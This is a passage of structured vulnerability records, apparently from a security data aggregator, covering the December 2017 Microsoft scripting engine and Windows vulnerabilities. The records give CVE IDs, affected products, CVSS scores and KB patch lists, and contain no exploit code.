Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information.\n\n### *Affected products*:\nChakraCore \nMicrosoft Edge (EdgeHTML-based) \nInternet Explorer 9 \nInternet Explorer 10 \nInternet Explorer 11\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-11886](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11886>) \n[CVE-2017-11887](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11887>) \n[CVE-2017-11888](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11888>) \n[CVE-2017-11889](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11889>) \n[CVE-2017-11890](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11890>) \n[CVE-2017-11893](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11893>) \n[CVE-2017-11894](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11894>) \n[CVE-2017-11895](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11895>) \n[CVE-2017-11901](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11901>) \n[CVE-2017-11903](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11903>) \n[CVE-2017-11905](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11905>) \n[CVE-2017-11906](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11906>) \n[CVE-2017-11907](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11907>) \n[CVE-2017-11908](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11908>) \n[CVE-2017-11909](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11909>) 
\n[CVE-2017-11910](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11910>) \n[CVE-2017-11911](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11911>) \n[CVE-2017-11912](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11912>) \n[CVE-2017-11913](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11913>) \n[CVE-2017-11914](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11914>) \n[CVE-2017-11918](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11918>) \n[CVE-2017-11919](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11919>) \n[CVE-2017-11930](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11930>) \n[CVE-2017-11916](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11916>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-11886](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11886>)7.6Critical \n[CVE-2017-11887](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11887>)2.6Warning \n[CVE-2017-11888](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11888>)7.6Critical \n[CVE-2017-11889](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11889>)7.6Critical \n[CVE-2017-11890](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11890>)7.6Critical \n[CVE-2017-11893](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11893>)7.6Critical \n[CVE-2017-11894](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11894>)7.6Critical \n[CVE-2017-11895](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11895>)7.6Critical \n[CVE-2017-11901](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11901>)7.6Critical 
\n[CVE-2017-11903](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11903>)7.6Critical \n[CVE-2017-11905](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11905>)7.6Critical \n[CVE-2017-11906](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11906>)2.6Warning \n[CVE-2017-11907](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11907>)7.6Critical \n[CVE-2017-11908](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11908>)7.6Critical \n[CVE-2017-11909](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11909>)7.6Critical \n[CVE-2017-11910](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11910>)7.6Critical \n[CVE-2017-11911](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11911>)7.6Critical \n[CVE-2017-11912](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11912>)7.6Critical \n[CVE-2017-11913](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11913>)7.6Critical \n[CVE-2017-11914](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11914>)7.6Critical \n[CVE-2017-11918](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11918>)7.6Critical \n[CVE-2017-11919](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11919>)2.6Warning \n[CVE-2017-11930](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11930>)7.6Critical \n[CVE-2017-11916](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11916>)7.6Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4053578](<http://support.microsoft.com/kb/4053578>) \n[4053579](<http://support.microsoft.com/kb/4053579>) \n[4053580](<http://support.microsoft.com/kb/4053580>) \n[4053581](<http://support.microsoft.com/kb/4053581>) \n[4054517](<http://support.microsoft.com/kb/4054517>) \n[4054518](<http://support.microsoft.com/kb/4054518>) \n[4054519](<http://support.microsoft.com/kb/4054519>) \n[4054520](<http://support.microsoft.com/kb/4054520>) \n[4052978](<http://support.microsoft.com/kb/4052978>)\n\n### 
*Exploitation*:\nThe following public exploits exist for this vulnerability:", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "kaspersky", "title": "KLA11158 Multiple vulnerabilities in Microsoft Browsers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11888", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11919", "CVE-2017-11930"], "modified": "2020-07-22T00:00:00", "id": "KLA11158", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11158/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-18T11:19:31", "description": "### *Detect date*:\n12/12/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). 
Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information.\n\n### *Affected products*:\nChakraCore \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nInternet Explorer 9 \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nWindows Server 2012 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nInternet Explorer 11 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2016 \nWindows 10 Version 1709 for x64-based Systems \nWindows RT 8.1 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 10 Version 1703 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nMicrosoft Edge (EdgeHTML-based) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server, version 1709 (Server Core Installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1703 for 32-bit Systems \nInternet Explorer 10 \nWindows Server 2012 R2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original 
advisories*:\n[CVE-2017-11885](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11885>) \n[CVE-2017-11886](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11886>) \n[CVE-2017-11887](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11887>) \n[CVE-2017-11894](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11894>) \n[CVE-2017-11927](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11927>) \n[CVE-2017-11907](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11907>) \n[CVE-2017-11890](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11890>) \n[CVE-2017-11912](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11912>) \n[CVE-2017-11906](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11906>) \n[CVE-2017-11903](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11903>) \n[CVE-2017-11913](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11913>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-11885](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11885>)8.5Critical \n[CVE-2017-11927](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11927>)4.3Warning \n[CVE-2017-11886](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11886>)7.6Critical \n[CVE-2017-11887](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11887>)2.6Warning \n[CVE-2017-11890](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11890>)7.6Critical \n[CVE-2017-11894](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11894>)7.6Critical \n[CVE-2017-11903](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11903>)7.6Critical 
\n[CVE-2017-11906](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11906>)2.6Warning \n[CVE-2017-11907](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11907>)7.6Critical \n[CVE-2017-11912](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11912>)7.6Critical \n[CVE-2017-11913](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11913>)7.6Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4052303](<http://support.microsoft.com/kb/4052303>) \n[4054518](<http://support.microsoft.com/kb/4054518>) \n[4054521](<http://support.microsoft.com/kb/4054521>) \n[4052978](<http://support.microsoft.com/kb/4052978>) \n[4103712](<http://support.microsoft.com/kb/4103712>) \n[4103718](<http://support.microsoft.com/kb/4103718>) \n[4130957](<http://support.microsoft.com/kb/4130957>)\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "kaspersky", "title": "KLA10918 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11890", "CVE-2017-11894", "CVE-2017-11903", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11927"], "modified": "2020-07-22T00:00:00", "id": "KLA10918", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10918/", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-08-18T11:15:37", "description": "### *Detect date*:\n12/12/2017\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Windows. Malicious users can exploit these vulnerabilities to obtain sensitive information, bypass security restrictions and execute arbitrary code.\n\n### *Affected products*:\nWindows 10 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 1511 for 32-bit Systems \nWindows 10 Version 1511 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1703 for 32-bit Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1709 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nWindows RT 8.1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 \nWindows Server 2012 
(Server Core installation) \nWindows Server 2012 R2 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2016 \nWindows Server 2016 (Server Core installation) \nWindows Server, version 1709 (Server Core Installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-11885](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11885>) \n[CVE-2017-11899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11899>) \n[CVE-2017-11927](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11927>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2017-11885](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11885>)8.5Critical \n[CVE-2017-11899](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11899>)7.5Critical \n[CVE-2017-11927](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11927>)4.3Warning\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4053578](<http://support.microsoft.com/kb/4053578>) \n[4053579](<http://support.microsoft.com/kb/4053579>) \n[4053580](<http://support.microsoft.com/kb/4053580>) \n[4053581](<http://support.microsoft.com/kb/4053581>) \n[4054517](<http://support.microsoft.com/kb/4054517>) \n[4054519](<http://support.microsoft.com/kb/4054519>) \n[4054520](<http://support.microsoft.com/kb/4054520>) \n[4054522](<http://support.microsoft.com/kb/4054522>) \n[4054523](<http://support.microsoft.com/kb/4054523>) \n[4103723](<http://support.microsoft.com/kb/4103723>) \n[4103716](<http://support.microsoft.com/kb/4103716>) \n[4103731](<http://support.microsoft.com/kb/4103731>) \n[4103715](<http://support.microsoft.com/kb/4103715>) 
\n[4103730](<http://support.microsoft.com/kb/4103730>) \n[4103726](<http://support.microsoft.com/kb/4103726>) \n[4103727](<http://support.microsoft.com/kb/4103727>) \n[4103725](<http://support.microsoft.com/kb/4103725>)\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "kaspersky", "title": "KLA11156 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885", "CVE-2017-11899", "CVE-2017-11927"], "modified": "2020-07-22T00:00:00", "id": "KLA11156", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11156/", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:42:13", "description": "Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user, due to how Internet Explorer handles 
objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11886", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-26T14:52:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:10"], "id": 
"CVE-2017-11886", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11886", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:17", "description": "ChakraCore and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11889", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-26T14:55:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11889", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11889", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:22", "description": "Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user, due to how Internet Explorer handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". 
This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11890", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-26T14:56:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:10"], "id": "CVE-2017-11890", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11890", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:57", "description": "ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Internet Explorer and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, 